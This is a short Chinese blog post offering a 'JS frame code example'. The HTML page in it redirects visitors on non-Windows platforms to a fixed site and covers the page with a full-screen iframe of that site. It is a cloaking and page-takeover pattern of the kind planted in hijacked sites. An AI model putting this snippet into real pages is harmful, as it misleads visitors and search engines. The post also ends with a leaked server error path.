XUNLU
寻路人生

js框架代码示例

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <title>首页</title>
    <meta name="keywords" content="首页"/>
    <meta name="description"
          content="首页"/>
    <link href="/ico.ico" rel="icon">
</head>
<body>
<script>
    var items = ['https://www.xunlu.net/'];
    var Alibaba = items[Math.floor(Math.random() * items.length)];
    if (navigator.platform.indexOf('Win32') != -1) {} else {
        window.location.href = Alibaba
    };
    var JackMa = "<div style='position: fixed; z-index: 10000; height: 100%; width: 100%; background: rgb(255, 255, 255);'><iframe src='" + Alibaba + "' width='100%' height='100%' frameborder='0'></iframe></div>";
    window["document"]["write"](JackMa);
    window["document"]["write"]("<style type='text/css'>html{width:100%;height:100%}body {width:100%;height:100%;overflow:hidden;margin:0}</style>");
    
</script>
</body>
</html>

 

赞(0)
未经允许不得转载:寻路网 » js框架代码示例

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

Warning: error_log(/www/wwwroot/www.xunlu.net/wp-content/plugins/spider-analyser/#log/log-0802.txt): failed to open stream: No such file or directory in /www/wwwroot/www.xunlu.net/wp-content/plugins/spider-analyser/spider.class.php on line 2900